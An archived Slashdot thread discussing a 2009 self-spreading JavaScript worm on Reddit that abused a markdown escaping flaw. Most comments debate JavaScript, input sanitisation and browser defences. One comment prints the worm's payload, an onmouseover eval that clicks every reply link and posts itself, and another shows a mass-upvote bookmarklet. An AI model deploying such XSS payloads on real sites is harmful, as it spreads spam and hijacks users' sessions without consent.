Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Reddit Javascript Exploit Spreading Virally

CmdrTaco posted more than 4 years ago | from the hate-when-that-happens dept.

Security 239

Nithendil writes "guyhersh from reddit.com describes the situation (warning: title NSFW): Based on what I've seen today, here's what went down. Reddit user Empirical wrote javascript code where if you copied and pasted it into the address bar, you would instantly spam that comment by replying to all the comments on the page and submitting it. Later xssfinder posted a proof of concept where if you hovered over a link, it would automatically run a Javascript. He then got the brilliant idea to combine the two scripts together, tested it and it spread from there."

cancel ×

239 comments

Sorry! There are no comments related to the filter you selected.

Is this good news or bad? (4, Funny)

Anonymous Coward | more than 4 years ago | (#29564863)

I don't know. Sounds good !!

Re:Is this good news or bad? (0, Flamebait)

ArsenneLupin (766289) | more than 4 years ago | (#29564889)

It's good news.

Indeed, it will educate people to surf with javascript turned off, and it will hopefully educate webmasters to stop programming their sites in a way that requires javascript even for basic functionality.

Re:Is this good news or bad? (-1, Offtopic)

ArsenneLupin (766289) | more than 4 years ago | (#29564913)

Oh, and btw, congrats for the fisht psot! :-)

Re:Is this good news or bad? (5, Insightful)

pla (258480) | more than 4 years ago | (#29564915)

it will hopefully educate webmasters to stop programming their sites in a way that requires javascript even for basic functionality.

*cough*Slashdot*cough*

Re:Is this good news or bad? (1)

SanityInAnarchy (655584) | more than 4 years ago | (#29565023)

It seems to work without Javascript, though it's usually faster with the script.

Re:Is this good news or bad? (1)

schon (31600) | more than 4 years ago | (#29565651)

it's usually faster with the script.

Hi there - you must have just popped in from some alternate universe... did Michael Jackson die there too? Was he black?

In this universe, the speed with javascript is noticeably slower - in many cases it's so slow as to be unusable. I've tried it from both my home and work desktops (quad-core, 4 and 8GB of RAM respectively), and from my Netbook (EeePC 901). It's *always* slower with javascript enabled.

Re:Is this good news or bad? (3, Interesting)

SanityInAnarchy (655584) | more than 4 years ago | (#29566157)

Hi there - you must have just popped in from some alternate universe

Yep. It's called Google Chrome -- or, more accurately, the Chromium nightly. Javascript executes quickly, and I don't have to wait for an entire separate page to load. Additionally, if I have to wait, the "submit" button has a countdown timer.

And regardless of speed, it is convenient to have that much more context on the page. For example, right now, I can see your post and mine, and I can expand the parents if I need to. If I was replying from the main discussion, I could scroll up to see the whole discussion. Yes, I know about tabs, but even switching with keyboard shortcuts isn't as nice as being able to actually see a few posts of context as I type.

In this universe, the speed with javascript is noticeably slower - in many cases it's so slow as to be unusable.

Which browser?

Re:Is this good news or bad? (2, Informative)

corbettw (214229) | more than 4 years ago | (#29565063)

Slashdot doesn't require Javascript. If it's turned off, you get sent to the classic POST form of yesteryear.

Re:Is this good news or bad? (1)

mcgrew (92797) | more than 4 years ago | (#29565813)

<script id="before-content" type="text/javascript">
var pageload = {
        pagemark: '521513116996487867',
        before_content: (new Date).getTime()
};
function pageload_done( $, console, maybe ){
        pageload.after_readycode = (new Date).getTime();
        pageload.content_ready_time = pageload.content_ready - pageload.before_content;
        pageload.script_ready_time = pageload.after_readycode - pageload.content_ready;
        pageload.ready_time = pageload.after_readycode - pageload.before_content; // Only report 1% of cases.
        maybe || (Math.random()>0.01) || $.ajax({ data: {
                op: 'page_profile',
                pagemark: pageload.pagemark,
                dom: pageload.content_ready_time,
                js: pageload.script_ready_time
        } });
}
</script>

Well, that looks like useful javascript to me.

<link rel="stylesheet" rev="stylesheet" href="//c.fsdn.com/sd/idlecore-tidied.css?T_2_5_0_272c" media="screen">

But it looks like that stylesheet is overridden by this:

<!--[if IE 7]><link rel="stylesheet" type="text/css" media="screen" href="//c.fsdn.com/sd/ie7-idle.css?T_2_5_0_272c" /><![endif]-->
<!--[if lt IE 7]><link rel="stylesheet" type="text/css" media="screen" href="//c.fsdn.com/sd/ie6-idle.css?T_2_5_0_272c" /><![endif]-->
<!--[if gte IE 8]><link rel="stylesheet" type="text/css" media="screen" href="//c.fsdn.com/sd/ie8-idle.css?T_2_5_0_272c" /><![endif]-->

I'm glad I looked at the source -- it seems I might be aboe to disable idle code by disabling javascript. I'll have to give it a try.

But to the /. coders' credit, they don't do any stupid crap like having javascript links when a simple <a href="http://www.somerandomwebpage.url">Some random web page</a> would do.

Re:Is this good news or bad? (5, Insightful)

Anonymous Coward | more than 4 years ago | (#29564943)

No, it won't. The other 6 million javascript exploits didn't do that. What makes you think this one will?

Re:Is this good news or bad? (5, Insightful)

SanityInAnarchy (655584) | more than 4 years ago | (#29565013)

Just as exploits in the image processing components of web browsers will hopefully educate people to surf in Lynx? Or exploits in their HTML rendering will hopefully educate people to surf by piping wget through less?

This was not because of Javascript, nor is Javascript going away because of this.

Re:Is this good news or bad? (4, Insightful)

ultranova (717540) | more than 4 years ago | (#29565471)

Just as exploits in the image processing components of web browsers will hopefully educate people to surf in Lynx? Or exploits in their HTML rendering will hopefully educate people to surf by piping wget through less?

There's a huge difference in complexity between image/HTML renderer and Javascript. Image file formats and HTML pages are not Turing complete, while Javascript is. Consequently, the former are "safe" in that it's possible to prove that a particular implementation is free of exploits that would allow running arbitrary code, while Javascript by definition can never be; the whole point of Javascript is to allow arbitrary code execution, so the best you could ever prove is that the code never leaves the confines of the Web browser - but having a script post comments does not require that.

This was not because of Javascript, nor is Javascript going away because of this.

Yes, this was because of Javascript, but no, sadly it won't be going away.

Re:Is this good news or bad? (4, Insightful)

Idiomatick (976696) | more than 4 years ago | (#29565735)

This isn't a lesson about javascript. It is a lesson we should have learned from Bobby Tables a long time ago. This shouldn't have been possible regardless of javascript.

For those not in the know: http://xkcd.com/327/ [xkcd.com]

Re:Is this good news or bad? (0)

Anonymous Coward | more than 4 years ago | (#29566099)

It is a lesson we should have learned from Bobby Tables a long time ago.

Yes, damnit. And there's more types of injection [zuavra.net] out there than just JS or SQL!

This subject resurfaces again and again on Slashdot and every time there's blame flying all over the place. It's very simple: escape the JavaScript! If you do it in a centralized manner for ALL the data you pass into HTML then you don't have to worry about isolated incidents.

Re:Is this good news or bad? (2, Insightful)

lysergic.acid (845423) | more than 4 years ago | (#29565793)

What exactly does being Turing complete have to do with it? If a scripting language weren't turing complete, but had direct read/write access to your file system, would it be any safer than JS?

The problem with Reddit isn't JavaScript but rather their markdown implementation. And the security threat here isn't to the user whose system is running the JS, but instead to the Reddit site. If you're using an up-to-date & secure browser, there's typically minimal risk to enabling JavaScript. That JavaScript can sometimes be used to do mischievous things is a reason why site owners should not recklessly allow JavaScript to be posted by untrusted users—just as you wouldn't want to allow unfiltered HTML code to be posted by untrusted users.

If someone posts a link on a Slashdot, and that link eventually gets Slashdotted, then does that mean hyperlinks are inherently unsafe and need to be disabled, or just that some common sense precautions need to be taken when using them?

Re:Is this good news or bad? (1)

SanityInAnarchy (655584) | more than 4 years ago | (#29566105)

the former are "safe" in that it's possible to prove that a particular implementation is free of exploits that would allow running arbitrary code, while Javascript by definition can never be

You don't think it's possible to formally prove a sandbox? Or you only think it's possible to formally prove a sandbox that's not Turing-complete?

Re:Is this good news or bad? (1)

sexconker (1179573) | more than 4 years ago | (#29566413)

In theory you can prove a sandbox is secure.
The actual code for its implementation? Nope.

Also, I've never seen a sandbox without sand all around outside of it. It's a terrible name, though apt, as there are indeed exploits for sandboxes, and as they become more popular, more exploits will follow.

The sand must flow, or some such.

Re:Is this good news or bad? (0)

Anonymous Coward | more than 4 years ago | (#29565081)

Indeed, it will educate people to surf with javascript turned off, and it will hopefully educate webmasters to stop programming their sites in a way that requires javascript even for basic functionality.

That's what some of us have been saying since Netscape first spawned a pop-up ad, some 15 years ago.

The only response (Netscape 3 vs. Netscape 4, and all versions of IE until IE7.) was to bury the "Disable Javascript" option a little bit deeper into the menus.

It wasn't until PrefBar [mozdev.org] came out that I got the single-click togglability for Javashit and Flash that I'd wanted for 15 years.

Re:Is this good news or bad? (0)

Anonymous Coward | more than 4 years ago | (#29565135)

I just want to remind you that the latest frenzy in most of the mainstream browsers is blazing javascript speed, boasting about it and improving it with each release... so this kind of exploits spread even faster.

Re:Is this good news or bad? (1)

Nicolay77 (258497) | more than 4 years ago | (#29565513)

It has Pavlov-reinforced me the idea that Opera is safer than other browsers.

Re:Is this good news or bad? (3, Insightful)

not already in use (972294) | more than 4 years ago | (#29565693)

It's 2009. We should be able to use the internet the way it is intended, with javascript. Javascript isn't the problem, poor programming on reddit's behalf is the problem.

Re:Is this good news or bad? (1)

avatar_charlie (1633965) | more than 4 years ago | (#29565743)

That'll be the day. You could kiss gmail and all the photo-upload sites goodbye immediately, as well as a TON of other sites....and as noted below, this site as well.

This issue serves to raise some legitimate concerns, but it should not be used to further an ideological "anything other than HTML/CSS is bad" mentality. And with all the interests arrayed against such a mentality, it wouldn't happen in any case.

The average user isn't going to associate the words "javascript exploit" with "Oh, I need to change settings in my browser". Even the user base of reddit, tech oriented as it is, isn't going to change basic settings and habits to avoid such a problem. Instead, Reddit will patch its hole, and everyone will get on with their day.

Case in point, I'm simply going to avoid Reddit for the rest of the day. Simple problem, simpler cure....

ironic javascript fail (1, Informative)

Anonymous Coward | more than 4 years ago | (#29565883)

Incidentally, I went to mod this and it failed... multiple times.

Though it eventually worked, I am not impressed.

It seems that Slashdot is so horribly broken and inconsistent as to be immune to such exploits.

Re:ironic mod fail (1)

quercus.aeternam (1174283) | more than 4 years ago | (#29565919)

Speaking of irony...

(I confess, it was me)

Re:Is this good news or bad? (1)

Lord Bitman (95493) | more than 4 years ago | (#29565941)

Okay, you go design a standard which can achieve "basic functionality" without javascript, and then we'll talk.
Oh right, that standard was "HTML Frames", and those were near-universally despised.

Re:Is this good news or bad? (1)

insertwackynamehere (891357) | more than 4 years ago | (#29566379)

hey 2001 called they want their rhetoric back

Liar liar (-1, Troll)

Anonymous Coward | more than 4 years ago | (#29564885)

pants on Fire... fox.

Well, that site has a terrible design (-1, Troll)

BadAnalogyGuy (945258) | more than 4 years ago | (#29564901)

I won't hold Slashdot up as some paragon of website design, but that reddit site really leaves a lot to be desired.

Is this really a concern? Can a site with such a terrible look and feel really have so many users? WTF is reddit anyway?

Re:Well, that site has a terrible design (1)

jDeepbeep (913892) | more than 4 years ago | (#29564933)

WTF is reddit anyway?

Interestingly enough, the stories that end up on /. are not infrequently posted several days earlier on Reddit.

Re:Well, that site has a terrible design (2)

Tei (520358) | more than 4 years ago | (#29564997)

Well.. this one was posted before on reddit. *laughts*

So.. yea.

Can anyone post the Javascript code here?, Its probabbly some boring use of ajax, but anyway...

Re:Well, that site has a terrible design (1)

ais523 (1172701) | more than 4 years ago | (#29565415)

No, Reddit got this story first. You'll notice that the links in the summary go to Reddit...

Re:Well, that site has a terrible design (1)

Neoncow (802085) | more than 4 years ago | (#29566005)

Almost as soon as people realized there was something strange going on, the programming subreddit started discussing the code.

http://www.reddit.com/r/programming/comments/9oobq/someone_put_a_malicious_java_script_comment_on_at/ [reddit.com]

http://www.reddit.com/r/programming/comments/9oo8j/source_code_for_the_redditfirefox_exploit/ [reddit.com]

Re:Well, that site has a terrible design (4, Informative)

aoni782 (1075319) | more than 4 years ago | (#29566359)

The script:

z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";o=document;e=o.getElementsByTagName('a');for(i=0;i<e.length;i++)if (e[i].innerHTML=='reply')$(e[i]).click();o=document;e=o.getElementsByTagName('tez="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";o=document;e=o.getElementsByTagName('a');for(i=0;i<e.length;i++)if (e[i].innerHTML=='reply')$(e[i]).click();o=document;e=o.getElementsByTagName('textarea');for(i=0;i<e.length;i++)e[i].value=z;e=o.getElementsByTagName('button');for(i=0;i<e.length;i++)if (e[i].innerHTML=='save'&&e[i].style.display!='none')$(e[i]).click();"

Re:Well, that site has a terrible design (1, Troll)

mandark1967 (630856) | more than 4 years ago | (#29565005)

So it's like the Slashdot firehose, except people read it?

wow...

Re:Well, that site has a terrible design (1)

stoolpigeon (454276) | more than 4 years ago | (#29565213)

And the other way around quite often.

Re:Well, that site has a terrible design (1)

Conspiracy_Of_Doves (236787) | more than 4 years ago | (#29565293)

Yeah. I've been watching that Carl Sagan autotune video since last Thursday.

Re:Well, that site has a terrible design (2, Insightful)

Trahald (698493) | more than 4 years ago | (#29564993)

I'm a long time slashdotter and now spend equal time on reddit. What draws me to reddit is the spartan interface. Of course, the content on reddit is halfway between slashdot's and digg's, so I (unfortunately) have to keep coming back.

Re:Well, that site has a terrible design (1)

RingDev (879105) | more than 4 years ago | (#29565613)

Come for the stories. Stay for the comments!

-Rick

Re:Well, that site has a terrible design (2, Insightful)

jmnugent (705421) | more than 4 years ago | (#29565241)

Over the years I've also spent quite a bit of time on social sites like Slashdot, Fark, Metafilter, Digg,etc.... but now spend the majority of my time on Reddit. I actually like the design (its simple, efficient and useful). But the beauty of Reddit is the organized structure of the sub-reddits. If I'm short for time, i can just quickly browse the frontpage. If I have more time, I can browse my favorite sub-reddits where people know me. The commenting system is easy on the eyes and easy to follow. and the userbase is a nice balance of attitudes.

proof of concept (2, Insightful)

yincrash (854885) | more than 4 years ago | (#29564907)

seriously. using the 'onhover' event is considered inventive enough to call it a proof of concept?

Re:proof of concept (4, Informative)

immortalpob (847008) | more than 4 years ago | (#29564995)

This is a flaw in Reddit's comment system, that allows the poster to get javascript code executed. A comment system should not allow you to use "onhover" that is the point.

Re:proof of concept (1)

Otto (17870) | more than 4 years ago | (#29565263)

A comment system should not allow you to insert javascript code of any kind, period. How exactly did he slip this past the filters? Does reddit even have filters?

Regardless, I've added reddit.com to my blocklist. Simple immunity. :)

Re:proof of concept (1)

maxume (22995) | more than 4 years ago | (#29565451)

What exactly are you worried about? The worst thing that could happen is that reddit did a poor job of closing the hole (the nasty comment has stopped spreading and is being mass deleted...) and someone could post some JS that tries to access some information of yours on another site, but the only way they will succeed is if the server side implementation of that other site is terribly flawed.

Re:proof of concept (1, Interesting)

Anonymous Coward | more than 4 years ago | (#29566251)

The implications of XSS vulnerabilities are much greater than you describe. Read this White paper, [virtualforge.de] particularly pages 19-27 to see the implications.

Give me an unfixed XSS vulnerability on a trusted site with top secret archives of sensitive material [xssed.org] and I can show you all sorts of mischief, including retrieval of the secret archive, administrator impersonation, password theft, phishing, page defacing, and much more. The opportunities are endless. I've seen this in recent legal documentation.

I can think of all sorts of exploits that would be specific to Reddit that could steal valuable information. I won't outline them here, as some jackass will go do them.

html tag to disable active content (4, Insightful)

TheLink (130905) | more than 4 years ago | (#29565569)

Years ago I actually proposed to the W3C and the mozilla bunch to add a tag to disable dynamic stuff like javascript.

Basically it would work something like this:

<shield lock="some_random_hard_to_guess_string_here" enabled="basic_html_only">
The browser will only recognize basic HTML stuff here, it won't recognize javascript or any _future_ dynamic stuff that the W3C or browser people think off
</shield unlock="some_random_hard_to_guess_string_here">

The some_random_hard_to_guess_string_here would be different for each page.

The idea is while the website should still have filters, even if in the future the W3C or browser wiseguys create some new fangled way of inserting javascript or some other dynamic content that the filters do not protect against (since it's new and the filters have not been updated), the browser will just ignore the new stuff that some hacker inserts when it's between the tags.

To me the current state of things is a bit crazy - basically it's like having a car with 1000 gas pedals (tags) and to stop the car you have to make sure all 1000 pedals are not pressed (escaped or filtered). There is not a single brake pedal! And worse, the W3C or MS or Mozilla or whoever could introduce a new gas pedal, and you the website operator have to filter out the new gas pedal when it's introduced.

With something like this tag there is a brake pedal, so even if you don't manage to filter out all the 1000 gas pedals, the brake helps to keep stuff safe.

If they had implemented such a tag, the google and myspace worms would not have worked for so many browsers.

FWIW, these sort of worms are not new. I managed to find a hole in advogato some years ago (iframe worm) - and hence my suggestion to the W3C and Mozilla.

But it seems to me than NONE of them are really interested in improving security. They're all just interested in inventing new gas pedals for people (and hackers) to step on. They're not even interested in creating a single brake pedal. They just pay lip service to security.

See the thing is - it's not too difficult to code a browser to go "OK from now on there's no such thing as javascript till I see a valid unlock tag", so even if there is a browser parsing bug and a hacker manages to insert javascript via a stupid browser bug (that the website filters naturally do not and cannot cater for) it does NOT matter - since javascript will be disabled - between those tags the browser will be respecting the flag that says "I do not know javascript, java and all that fancy stuff" - it does not even have to parse javascript - since for all intents and purposes between those tags, the browser does not know there's such a thing as javascript (or activex or flash etc).

This is very useful for sites that have to include 3rd party content - sites like slashdot or webmail sites or even sites that serve up ads from 3rd parties.

Re:html tag to disable active content (0)

Anonymous Coward | more than 4 years ago | (#29565841)

M0d par3nt u!P Smart way of dealing with a dumb problem - just generate a 128bit nonce for the tag on the server side, problem solved.

Re:html tag to disable active content (0)

Anonymous Coward | more than 4 years ago | (#29566037)

I don't really see how this would work. First of all, you say that websites should implement filters anyways, but if they have this tool, many will think they don't need to.

Then the web will be an even more dangerous place for browsers that don't implement this.

It really isn't all that hard to filter HTML. I don't think any standard has yet been introduced nor will be that does not use standard tags with angle brackets. So all your filter has to do is remove these tags. If you really want your users to be able to post content with tags, then *whitelist* tags and attributes, but at your own peril.

Re:html tag to disable active content (1)

sukotto (122876) | more than 4 years ago | (#29566185)

So then people would first have to paste a comment "" and THEN paste the comment with the exploit code?

Re:html tag to disable active content (1)

harry666t (1062422) | more than 4 years ago | (#29566195)

You can't assign attributes to end tags. XML/HTML won't let you do that and extending it to be able to do so would be a bit of a revolution. Too many existing parsers rely on the current behaviour. But maybe you could possibly do something along '''<startshield key="lalala" /> stuff <endshield key="lalala" />''', although I believe that'd also be a bit of a hack.

What we actually really need, and what is the real solution, is just a little more careful programming on the server side. Write a function that takes a string as an input and produces an escaped string as an output. Prove mathematically that no input shall ever produce broekn otuput. Simple.

Re:html tag to disable active content (4, Insightful)

Timmmm (636430) | more than 4 years ago | (#29566317)

Well that's an overly complicated and... well *wrong* way to do it. The correct solution is:

1. Escape all <'s and >'s and &'s in the input.
2. Interpret BB-code to add links & basic formatting.

Simple.

Re:proof of concept (2, Insightful)

MathFox (686808) | more than 4 years ago | (#29565009)

It is just a reminder to programmers of public forum software how important input sanitation is.

Apparently the damage was limited to only one site... But similar hacks could be done on other vulnerable sites.

Re:proof of concept (1)

pjt33 (739471) | more than 4 years ago | (#29565233)

Have been. Sun's fora spring to mind.

Re:proof of concept (1)

gzipped_tar (1151931) | more than 4 years ago | (#29565563)

Not just 'public forum software'. Every motherfucking kind of software.

NoScript (4, Insightful)

corychristison (951993) | more than 4 years ago | (#29564909)

"NoScript FTW!" comments commencing in 3... 2... 1...

I skimmed the FAQ on the first link, and it seems reddit is responsible for not scrubbing input.

Next!

Re:NoScript (3, Interesting)

CKW (409971) | more than 4 years ago | (#29564931)

I love how *their* mistake causes viral problems in YOUR browser. All one needs is some sort of cross site vulnerability now and ...

Re:NoScript (1)

AnotherShep (599837) | more than 4 years ago | (#29565215)

The obvious solution is that you need to get revenge. Go start a popular site for owners of popular sites so you can cause viral problems in THEIR browser.

Re:NoScript (1, Informative)

maxume (22995) | more than 4 years ago | (#29565281)

You seem to have misunderstood what is going on. There isn't really a 'viral problem' in the browser, there is (was) a comment that would cause your browser to spam the server with copies of itself. So the problem is described as viral because it spreads to new users as they hover over an infected comment, but the problem is pretty well localized to reddit.com, and browser security is in no way compromised.

Re:NoScript (0)

Anonymous Coward | more than 4 years ago | (#29566093)

There's something better than noscript: quickjava [mozilla.org] . Noscript works, but it's a pain because it insists on making exceptions to what I assumed meant "absolutely no javascript until I turn it on". I don't want to think about anything, I just want to be able to turn it off/on with a single click. It also requires several annoying clicks to disable/enable javascript.

Quickjava, on the other hand, is exactly what I envisioned when I wished I could turn javascript off/on with a single click. No questions asked, no surprises, either completely on or completely off.

Re:NoScript (4, Insightful)

RiotingPacifist (1228016) | more than 4 years ago | (#29566239)

Cue me reposting my views on noscript being a pretty crappy tool for modern web security then.

NoScript comes from a broken way of thinking, "you can identify attacking sites and trusted sites", the attack code for this was coming from reddit.com (a site you have to allow in order to use reddit). The only way this sort of bug can be protected against is by use of javascript filtering tools such as controldescripts [mozdev.org] that filter javascript request by type and domain, with such a tool it would be possible to protect yourself much more effectively.

mouseclick is submitting info -> allow
mouseover is requesting data -> allow
mouseover is submitting data -> request user confirmation
javascript function is doing something weird -> request user confirmation
javascript is trying to use a known exploit* -> deny and notify user (as a workaround for 0-days simply blocking the bad JS calls will protect users much faster than browsers usually get patched) ...etc

You could also combine this with domain checking to have lists of pages where you allow
*no-js (untrusted),
*simple-JS (google, youtube, etc) but [it might allow functionality but could prevent tracking],
*complex-js (facebook, etc) [all the ajax stuff means simple-JS wouldn't work]
*all-JS (fancynewsite.com) [even the complex list of functions you allow just isn't enough]

Such tools could also help the paranoid among us use website that require JS, by disabling mousetracking and sending of data on non-click actions.

As long as people stick to the broken thinking of trusted/untrusted domains, there is little chance of this actually happening. The worst thing about noscript is that for an unkown site you often have to allow JS on it to see what it looks like, so unless you plan on only browsing sites you've already been to and those that don't use javascript, it is completely useless yet its users claim, nay genuinely think they are more secure!

White hat vs Black hat (1)

thepooh81 (1606041) | more than 4 years ago | (#29564921)

The guy who did this is clearly intelligent. Although I got hit with this yesterday all I could think about what how clever it was. Too bad he's not using his powers for good (unless you consider taking down reddit good).

What do you think stops black hats from converting? Easy money? Life outside the "norm"?

Re:White hat vs Black hat (3, Funny)

mcgrew (92797) | more than 4 years ago | (#29564991)

What do you think stops black hats from converting? Easy money? Life outside the "norm"?

Sociopathy, perhaps?

Re:White hat vs Black hat (1)

PalmKiller (174161) | more than 4 years ago | (#29565087)

I think you are confusing a hacker with a java script kiddie.

Re:White hat vs Black hat (1)

BlueKitties (1541613) | more than 4 years ago | (#29566303)

Agree'd. There's a big difference between finding an exploit in a secure system and finding an exploit in a JavaScript driven page that wasn't scrubbed. Back in the golden days, 1337 H4x used to post specially crafted HTML into a comment/post like this, because the website didn't scrub the posts. It's like SQL injection, only with HTML tags. And in this case, it's JavaScript instead of HTML.

I remember on gamefaqs.com, users used to post italic/bold tags without closures, which caused the entire remainder of the page to end up in italics/bold. Of course, these "exploits" ended up being deemed hacks, when in fact it's more or less a stupid webpage.

bravery (1)

Necroloth (1512791) | more than 4 years ago | (#29564925)

So an article noting a working proof of concept of running a script by hovering over a link... and two links in the summary provided... is this the nerds russian roulette? :p

NSFW? (2)

mcgrew (92797) | more than 4 years ago | (#29564953)

guyhersh from reddit.com describes the situation (warning: title NSFW)

Does anybody have a SFW link? Something like this certainly must have more than one FA.

Re:NSFW? (1)

leuk_he (194174) | more than 4 years ago | (#29565073)

the faq "1) What the fuck?" might be considered NSFW?

or maybe some content that is displaye only when js is enabled, something that is not recommented on a page called javascript exploit.

Re:NSFW? (1)

mcgrew (92797) | more than 4 years ago | (#29565253)

Thanks, I guess I can RTFA. That's no less SFW than slashdot. I wonder why the warning?

Re:NSFW? (1)

sadness203 (1539377) | more than 4 years ago | (#29565437)

Because of the word fuck...
If someone lose is job on that particular title... he deserved a better job...
"OMG ... he's reading porn again ! I can see the word fuck everywhere on the server log, I must go tell the boss!"

Re:NSFW? (1)

bertoelcon (1557907) | more than 4 years ago | (#29565111)

It just says "what the fuck" in the title. Their work has to be really restrictive to have one word cause a problem.

Re:NSFW? (4, Funny)

BlackSabbath (118110) | more than 4 years ago | (#29565115)

> Eye owl wise ewes a spill chucker sew eye no my spilling is core wrecked.

Hey, whadda ya know? A sig with a New Zealand accent.

(Yeah, yeah, I know, offtopic, blah, blah, mod-away...)

Re:NSFW? (1)

pavon (30274) | more than 4 years ago | (#29565149)

The only thing NSFW about the link is that it says "What the fuck" in the title/url. So unless you have a really braindead tripwire at work it shouldn't be a problem.

Re:NSFW? (4, Funny)

Yvan256 (722131) | more than 4 years ago | (#29565231)

The only fucking thing NSFW about the link is that it fucking says "What the fuck" in the title. And if you can read my fucking comment, you can go ahead and fucking click that link.

And here's another "Fuck" just for the heck of it.

Warning: my comment was NSFW and should not have been read.

Re:NSFW? (4, Funny)

tehcyder (746570) | more than 4 years ago | (#29565597)

Warning! The above post is NSFW!

Re:NSFW? (4, Funny)

Anonymous Coward | more than 4 years ago | (#29565831)

FUCK!!!

Re:NSFW? (1)

jmorkel (952809) | more than 4 years ago | (#29565737)

I was expecting boobies in TFA. Leaving disappointed.

Re:NSFW? (1)

Rogerborg (306625) | more than 4 years ago | (#29565243)

It's OK, the link to the article already contains the "NSFW title", so you're damned already in the eyes of your sysadmin.

Reddit Hacks (3, Interesting)

jDeepbeep (913892) | more than 4 years ago | (#29565031)

This is nothing new. There is a quiet tradition of Reddit users finding the weak points of the site, like this [reddit.com] for example.

Putting javascript:$(".up").click()() in the address bar upvotes everything on the page.

Re:Reddit Hacks (1)

RalphSleigh (899929) | more than 4 years ago | (#29565713)

That's the use opting to execute extra javascript on your page, if this breaks your web site/application for more than that user then you are not doing it right. The posted hack is something much more fun.

Re:Reddit Hacks (4, Insightful)

Chris Pimlott (16212) | more than 4 years ago | (#29565857)

This is not a weakness or an exploit, it's simply a javascript bookmarklet. [wikipedia.org] You could make something like this for any site, such as Slashdot.

It's only an exploit if you can force other people to run that code without their consent.

Re:Is this good news or bad? (2, Insightful)

Anonymous Coward | more than 4 years ago | (#29565083)

Indeed, it will educate people to surf with javascript turned off, and it will hopefully educate webmasters to stop programming their sites in a way that requires javascript even for basic functionality.

Anyone who believes this has simply never written a web application. Javascript and cookies are absolutely essential to any web programmer who wishes have any type of dynamic content on a page. It annoys me to no end when someone says the solution to security holes is to turn these features off. The solution is for programmers to stop being idiots and write secure code, both in web applications and in the browsers themselves.

Re:Is this good news or bad? (1, Insightful)

Anonymous Coward | more than 4 years ago | (#29565317)

Anyone who believes this has simply never written a web application. Javascript and cookies are absolutely essential to any web programmer who wishes have any type of dynamic content on a page. It annoys me to no end when someone says the solution to security holes is to turn these features off.

Wrong. We're not ignorant, we just think that "dynamic content" isn't important or useful.

Re:Is this good news or bad? (0)

Anonymous Coward | more than 4 years ago | (#29565497)

Yeah, a full post back for every operation a user may need to do is a much better approach.

Re:Is this good news or bad? (0)

Anonymous Coward | more than 4 years ago | (#29565865)

Then perhaps you'd like to head down to your local library, you might find books a bit more appealing than computers...

Re:Is this good news or bad? (0)

Anonymous Coward | more than 4 years ago | (#29566041)

Wrong. We're not ignorant, we just think that "dynamic content" isn't important or useful.

You've never actually been paid to create a web page, have you? (at least, not in the last five years)

Re:Is this good news or bad? (5, Insightful)

Anonymous Coward | more than 4 years ago | (#29565353)

As a web developer, I beg to differ. There is absolutely no excuse for writing a page that doesn't 'fail gracefully' when javascript isn't present. Let's face it, for every reputable page out there (att.net, youtube.com, etc) there are a hundred others designed by average joe-schmo webprogrammers. And lord only knows if they designed their page securely, and lord only knows if someone has hacked them and injected malicious scripts. I seem to recall hearing a few weeks ago that the majority of malicious scripts were being put into hollywood celebrity gossip sites that people were hitting off their google searches.

For me, the solution is to just whitelist the sites I visit frequently, only allowing scripts/cookies when I know they can be trusted. I'm not saying that you shouldn't design without javascript, but I am saying that you shouldn't assume that everyone visiting your page is going to have it. Besides, how hard is it to write a page that vomits up its contents in a readable form when the javascript doesn't run to position all the css objects? It doesn't have to look pretty, but it should be usable.

Re:Is this good news or bad? (2, Interesting)

lwsimon (724555) | more than 4 years ago | (#29566333)

Amen. I've gotten into the habit of structuring the document, outputting the data into readable form, then using CSS and JS to make it look and behave how I want it to.

There are some pages where "no access without javascript" is acceptable - but they are few and far between. For the most part, you should be able to use Lynx and view the content.

Re:Is this good news or bad? (4, Insightful)

aardvarkjoe (156801) | more than 4 years ago | (#29565507)

The solution is for programmers to stop being idiots

Any proposal that relies on any group of people to not be idiots is doomed to failure.

Re:Is this good news or bad? (1)

slack_justyb (862874) | more than 4 years ago | (#29565561)

The solution is for programmers to stop being idiots and write secure code

Yeah because that mantra has really caught on, especially with Microsoft employees.

Face it, programs are written by people, people are made to f*** up on epic scale [wikipedia.org] , therefore, you need to be ready to handle epic f*** ups or just not play ball. Granted you don't get the same dynamic experience but that's the trade off. I'm sure the guy your quoting understands that.

Re:Is this good news or bad? (3, Insightful)

ultranova (717540) | more than 4 years ago | (#29565585)

Anyone who believes this has simply never written a web application. Javascript and cookies are absolutely essential to any web programmer who wishes have any type of dynamic content on a page.

So by advising people to disable Javascript, I'm doing my part for killing off "Web Applications" and getting us back to good old Web Pages. Excellent.

Seriously, why would I want "dynamic content" when all that really means is a thousand pauses as more data is fetched? Give me static pages whenever possible. Better yet, give me a single large static page rather than a dozen small pages, so I don't have to wait while the next page is being loaded and rendered.

The solution is for programmers to stop being idiots and write secure code, both in web applications and in the browsers themselves.

The solution is to understand that most web sites are not applications, from the users point of view, and stop stuffing them full of scripts that do nothing but slow things down.

Re:Is this good news or bad? (1)

k8to (9046) | more than 4 years ago | (#29565805)

Hooray for ultranova.

There's a few rare cases where I actually want a web application. Most of the web applications I view as totally useless or inferior to native applications.

Most web pages aren't even bad web applications, they're just WEB PAGES. Don't require javascript to do amazingly trivial things like.. load the content.

Already fixed. (2, Informative)

complete loony (663508) | more than 4 years ago | (#29565183)

KeyserSosa Thanks for this (and thanks aedes ). I'm going to steal his idea and post here as well. We've fixed a couple of underlying bugs in markdown.py, and will write a blog post for those interested once the dust settles. We've also gone through and deleted the offending comments. This exploit was a good old-fashioned worm, and its only purpose seems to have been to spread (and spread it did). The effect was limited to the site, and no user information was compromised.

So obviously this is no longer spreading.

A Good Idea (5, Insightful)

CopaceticOpus (965603) | more than 4 years ago | (#29565255)

Hey, everyone, there is a javascript exploit on Reddit! Click on these links to Reddit to learn more.

Incidentally, this old sock smells awful. You should smell it.
